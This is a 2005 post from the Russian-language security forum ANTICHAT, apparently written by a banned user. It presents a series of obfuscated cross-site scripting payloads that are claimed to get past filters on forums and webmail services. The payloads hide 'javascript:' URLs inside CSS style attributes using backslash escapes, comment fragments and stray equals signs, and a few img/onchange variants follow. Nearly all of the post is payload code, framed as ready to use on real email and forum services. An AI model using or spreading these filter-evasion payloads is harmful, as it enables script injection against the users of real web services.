ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Новый обход фильтров форумов и и-мейлов используя атрибут style |
01.12.2005, 04:30
|
|
Banned
Регистрация: 29.11.2005
Сообщений: 11
Провел на форуме:
42521
Репутация:
-1
|
|
Новый обход фильтров форумов и и-мейлов используя атрибут style
Эти структуры, проверял, работают на ВСЕХ и-мейлах как и на Русских, так и на Английских. Все что нужно, так это разрушить структуру тегов, что не смешите меня, для меня и для знающих, пустяки. На форуме труднее ломать структуру, чем на и-мейлах.
Код HTML:
<html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\(\'\w\j\'\)\)" >wj<a></body></html>
Код HTML:
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>
Код HTML:
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html>
without single ( ') quotes.
Код HTML:
<html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
without single ( ') or double ( ") quotes.
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
With equals sign. ( =) ( =)
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html>
With equals sign and single quotes. ( =) ( =) ( ')
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*=/='=\=w=\=j=\='=/=*=*=/=\=/=*=*/)/*=*=/=\==/=*=*/) >wj<a></body></html>
With equals sign and single quotes, but text inside the alert box, omitted. ( =) ( =) ( ')
Просто интересно, что случается в этой комбинации для знающих. Легче всего просматривать в Фаерфоксе.
Код HTML:
<html><img src="blah.gif" <onchange="alert('you cli=cked me')"></body></html>
и
Код HTML:
<html><img src="blah.gif" <onchange="alert('you clicked me')"></body></html>
Вообщем не один фильтр, эти комбинации не палит, и можете это все проверить на locahost.
Все это проверялось, и все это вы можете проверить и сами, открыв блокнот, copy/paste одну из комбинаций моих кодов как и есть, и сохранить как filename.html
Работает только в браузере ИЕ.
А вот и моя коронка......
Код HTML:
<html><img src="blah.gif" <span style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) me')"
<img src="blah.gif" <onchange="alert('you cli=cked me')">></body></html>
Последний раз редактировалось SladerNon; 01.12.2005 в 18:32..
Причина: Ролик убрал на mail.yahoo.com
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид